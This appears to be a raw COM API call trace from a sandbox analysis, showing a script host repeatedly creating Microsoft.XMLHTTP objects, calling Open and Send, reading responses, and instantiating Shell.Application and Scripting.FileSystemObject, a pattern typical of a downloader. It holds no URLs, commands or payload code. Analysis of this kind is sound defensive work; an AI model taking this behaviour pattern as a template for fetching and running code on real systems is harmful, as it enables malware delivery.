	[0342.801] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0342.801] ??2@YAPEAX_K@Z () returned 0x62f330
	[0342.801] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f330) 
	[0342.801] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0342.801] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0342.801] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7720) returned 0x0
	[0342.801] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7720) returned 0x3
	[0342.801] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0342.801] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7720, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0342.801] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0342.801] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0342.801] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7720, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0342.802] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0343.584] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0343.585] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7720, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0343.585] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0343.585] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0343.585] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7720, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0343.585] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0343.585] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0343.585] SysStringLen (param_1=0x0) returned 0x0
	[0343.585] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0343.585] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0343.586] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0343.586] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0343.586] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0343.586] ??2@YAPEAX_K@Z () returned 0x62f350
	[0343.586] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0343.586] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0343.586] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0343.586] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0343.586] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0343.586] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0343.586] SysStringLen (param_1=0x0) returned 0x0
	[0343.586] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0343.589] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0343.589] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0343.589] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0343.589] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0343.589] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0343.589] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0344.597] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0344.597] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7720, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0344.597] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0344.598] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0344.598] SysStringLen (param_1=0x0) returned 0x0
	[0344.598] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0344.598] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0344.599] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7720) returned 0x0
	[0344.599] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0344.599] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0344.599] ??2@YAPEAX_K@Z () returned 0x62f330
	[0344.599] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0344.599] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0344.599] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0344.599] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7720) returned 0x0
	[0344.599] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7720) returned 0x3
	[0344.599] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0344.599] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7720, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0344.601] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0344.601] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0344.601] SysStringLen (param_1=0x0) returned 0x0
	[0344.601] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0344.601] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0344.601] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7780) returned 0x0
	[0344.602] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0344.602] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7780, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c77e8) returned 0x0
	[0344.602] ??2@YAPEAX_K@Z () returned 0x62f310
	[0344.602] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c77e8, pUnkSite=0x62f310) 
	[0344.602] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0344.602] XMLHTTPRequest:IUnknown:Release (This=0x49c77e8) returned 0x0
	[0344.602] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7780, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7780) returned 0x0
	[0344.602] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7780) returned 0x3
	[0344.602] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7780, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0344.602] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7780, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0344.602] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7780, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0344.602] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0344.602] SysStringLen (param_1=0x0) returned 0x0
	[0344.602] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0344.602] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0344.602] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0344.602] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0344.602] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c88) returned 0x0
	[0344.602] ??2@YAPEAX_K@Z () returned 0x62f330
	[0344.603] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c88, pUnkSite=0x62f330) 
	[0344.603] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0344.603] XMLHTTPRequest:IUnknown:Release (This=0x49c5c88) returned 0x0
	[0344.603] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0344.603] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0344.603] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0344.603] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0344.603] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0344.603] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0344.603] SysStringLen (param_1=0x0) returned 0x0
	[0344.603] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0344.603] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0344.603] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7720) returned 0x0
	[0344.603] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
